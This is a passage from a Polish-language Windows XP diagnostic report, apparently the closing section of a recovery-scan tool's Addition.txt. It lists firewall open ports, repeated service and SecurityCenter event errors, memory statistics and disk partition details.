Legends Launcher StandardProfile\GloballyOpenPorts: [8396:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8396:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6946:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6946:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6953:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6953:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8397:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8397:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [1900:UDP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22007 StandardProfile\GloballyOpenPorts: [2869:TCP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22008 StandardProfile\GloballyOpenPorts: [6997:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6997:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6904:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6904:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6956:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [6956:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8398:TCP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8398:UDP] => Enabled:League of Legends Launcher StandardProfile\GloballyOpenPorts: [8393:TCP] => Enabled:League of Legends Lobby StandardProfile\GloballyOpenPorts: [8393:UDP] => Enabled:League of Legends Lobby StandardProfile\GloballyOpenPorts: [8390:TCP] => Enabled:League of Legends Game Client StandardProfile\GloballyOpenPorts: [8390:UDP] => Enabled:League of Legends Game Client StandardProfile\GloballyOpenPorts: [58365:TCP] => Enabled:Pando Media Booster StandardProfile\GloballyOpenPorts: [58365:UDP] => Enabled:Pando Media Booster StandardProfile\GloballyOpenPorts: [1542:TCP] => Enabled:Realtek WPS TCP Prot StandardProfile\GloballyOpenPorts: [1542:UDP] => Enabled:Realtek WPS UDP Prot StandardProfile\GloballyOpenPorts: [53:UDP] => Enabled:Realtek AP UDP Prot ==================== Punkty Przywracania systemu ========================= Sprawdź usługę "winmgmt" lub napraw WMI. ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/25/2017 02:20:38 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/24/2017 01:34:34 PM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/24/2017 01:55:55 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/23/2017 04:06:28 PM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/23/2017 02:34:10 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/22/2017 01:23:32 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/21/2017 08:01:52 PM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/21/2017 03:57:02 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/20/2017 02:21:07 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Error: (05/19/2017 02:06:06 AM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Dziennik System: ============= Error: (05/25/2017 07:24:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/25/2017 06:23:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/25/2017 04:35:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/25/2017 03:44:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/25/2017 03:15:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa snare niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/25/2017 03:01:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/25/2017 02:57:41 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: iSafeKrnlMon Error: (05/25/2017 02:57:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/24/2017 10:18:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. Error: (05/24/2017 07:42:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi BEDaisy z powodu następującego błędu: Nie można wykonać żądania z powodu błędu urządzenia We/Wy. ==================== Statystyki pamięci =========================== Procesor: AMD Athlon(tm) 64 Processor 3200+ Procent pamięci w użyciu: 79% Całkowita pamięć fizyczna: 2047.48 MB Dostępna pamięć fizyczna: 411.68 MB Całkowita pamięć wirtualna: 2917.24 MB Dostępna pamięć wirtualna: 1256.88 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:122.04 GB) (Free:106.89 GB) NTFS ==>[dysk z komponentami startowymi (Windows XP)] Drive d: () (Fixed) (Total:404.12 GB) (Free:374.94 GB) NTFS Drive e: () (Fixed) (Total:405.36 GB) (Free:397.25 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 2BD2C32A) Partition 1: (Active) - (Size=122 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=809.5 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================